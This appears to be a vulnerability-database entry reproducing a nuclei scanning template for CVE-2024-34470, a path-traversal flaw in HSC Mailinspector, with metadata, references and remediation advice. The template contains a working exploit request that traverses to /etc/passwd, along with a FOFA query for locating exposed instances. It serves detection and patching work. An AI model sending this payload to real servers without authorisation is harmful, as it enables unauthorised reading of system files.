Lucene search
+L

HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion

🗓️ 11 Sep 2026 05:22:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 141 Views

HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion vulnerability allows unauthenticated path traversal, potential read of arbitrary files

Related
Refs
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for Path Traversal in Hsclabs Mailinspector
5 May 202400:31
githubexploit
githubexploit
GithubExploit
Exploit for Path Traversal in Hsclabs Mailinspector
23 Jun 202402:23
githubexploit
githubexploit
GithubExploit
Exploit for Path Traversal in Hsclabs Mailinspector
19 Jun 202411:32
githubexploit
githubexploit
GithubExploit
Exploit for Path Traversal in Hsclabs Mailinspector
20 Jun 202416:47
githubexploit
circl
Circl
CVE-2024-34470
12 Jun 202415:51
circl
cnnvd
CNNVD
HSC Cybersecurity HC Mailinspector 路径遍历漏洞
6 May 202400:00
cnnvd
cve
CVE
CVE-2024-34470
6 May 202400:00
cve
cvelist
Cvelist
CVE-2024-34470
6 May 202400:00
cvelist
kitploit
Kitploit
CVE-2024-34470
11 Sep 202600:38
kitploit
kitploit
Kitploit
CVE-2024-34470
7 Sep 202619:46
kitploit
Rows per page
id: CVE-2024-34470

info:
  name: HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion
  author: topscoder
  severity: high
  description: |
    An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.
  impact: |
    Unauthenticated attackers can exploit path traversal to read arbitrary files from the server.
  remediation: |
    Update HSC Mailinspector to a version later than 5.2.18 that patches the path traversal vulnerability.
  reference:
    - https://github.com/osvaldotenorio/CVE-2024-34470
    - https://github.com/nomi-sec/PoC-in-GitHub
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2024-34470
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
    epss-score: 0.06699
    epss-percentile: 0.93511
  metadata:
    verified: true
    max-request: 2
    fofa-query: "mailinspector/public"
  tags: cve,cve2024,lfi,mailinspector,hsc,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/mailinspector/login.php"

    host-redirects: true
    matchers:
      - type: word
        part: body
        words:
          - "Licensed to HSC TREINAMENTO"
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/mailinspector/public/loader.php?path=../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402203fbeb90eb73d9ade113d8714edb7b6f524afe3ea9881503d611528115bb4cfdf02203cf4f2e8cf524378af90031d9fdfd553f8b9f1ca36300cbc2de9b17f2f0c8fec:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
8High risk
Vulners AI Score8
CVSS 3.18.6
EPSS0.06699
SSVC
141